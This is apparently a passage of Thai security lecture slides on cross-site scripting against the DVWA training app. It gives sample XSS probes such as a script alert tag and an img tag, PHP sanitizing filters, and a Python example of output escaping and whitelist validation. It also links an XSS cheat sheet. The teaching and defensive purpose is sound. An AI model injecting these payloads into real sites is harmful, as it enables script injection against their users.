  ❖ Printing out the session/request parameters in error pages
❖ Great XSS resource: http://ha.ckers.org/xss.html

Ex.2 Cross-Site Scripting

❖ Learn to do XSS on DVWA
❖ Understand how weak a web application can be
❖ Learn how to prevent this attack
❖ Know how to program securely

Cross Site Scripting (XSS) - Hands on

! <b>HTML Tag</b>
! <script>alert("XXX"); </script>
! <img src="http://www.aaa.com/a.jpg">

How to fix

! htmlspecialchars()

Input filtering

! Input sanitizing
  ! FILTER_SANITIZE_SPECIAL_CHARS
    removes HTML special characters (e.g. ' " < > &)
  ! FILTER_SANITIZE_URL
    removes everything that is not a letter, a digit, or one of $-_.+!*'(),{}|\^~[]`<>#%";/?:@&=
! Logical filtering
  ! FILTER_VALIDATE_EMAIL
  ! FILTER_VALIDATE_INT
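An added example, not from the slides, covering both the "Preventing XSS" output-escaping point and the "Input filtering" whitelist validators: Python's html.escape stands in for htmlspecialchars()/JSTL's c:out, and the regular expressions stand in for FILTER_VALIDATE_INT and FILTER_VALIDATE_EMAIL. The request parameters are constructed test inputs (the three strings from the hands-on slide plus form fields), and the phone-number format is an assumed local pattern.

```python
import html
import re


def escape_for_html(text):
    """Output escaping: characters HTML would interpret become entities, so
    <script> is emitted as &lt;script&gt; yet the browser still shows <script>."""
    return html.escape(text, quote=True)


def render_greeting(name):
    """Reflect a request parameter into a page, escaping at the point of output."""
    return "<p>Hello, " + escape_for_html(name) + "</p>"


# Whitelist validators: each states what is acceptable and rejects the rest,
# instead of enumerating bad characters (the blacklist approach the slides
# warn against). Patterns are assumptions for this example.
INT_RE = re.compile(r"[+-]?[0-9]+")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")
PHONE_RE = re.compile(r"\+?[0-9]{2,3}([- ]?[0-9]{3,4}){2}")   # e.g. 02-123-4567


def validate_int(value):
    """Return the integer, or None when the input is not purely an integer
    (the slide's 'if the id parameter is a number, parse it' rule)."""
    return int(value) if INT_RE.fullmatch(value.strip()) else None


def validate_email(value):
    return value if EMAIL_RE.fullmatch(value) else None


def validate_phone(value):
    return value if PHONE_RE.fullmatch(value) else None


def handle_request(params):
    """Validate each typed parameter against what the business logic expects,
    and escape whatever free text is reflected. Returns (html, rejected)."""
    rejected = []
    if validate_int(params.get("id", "")) is None:
        rejected.append("id")
    if validate_email(params.get("email", "")) is None:
        rejected.append("email")
    if validate_phone(params.get("phone", "")) is None:
        rejected.append("phone")
    page = render_greeting(params.get("name", ""))
    return page, rejected


# Constructed request: the hands-on slide's script payload as the name,
# plus well-formed typed fields.
SAMPLE_REQUEST = {
    "name": '<script>alert("XXX"); </script>',
    "id": "42",
    "email": "user@example.com",
    "phone": "02-123-4567",
}

if __name__ == "__main__":
    page, rejected = handle_request(SAMPLE_REQUEST)
    print(page)          # <p>Hello, &lt;script&gt;alert(&quot;XXX&quot;); &lt;/script&gt;</p>
    print("rejected:", rejected)
```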

Follow me

Name : Kitisak Jirawannakool
Facebook : http://www.facebook.com/kitisak.note
Email : [email protected]
[email protected]
Weblog : http://foh9.blogspot.com
Twitter : @kitisak

Q/A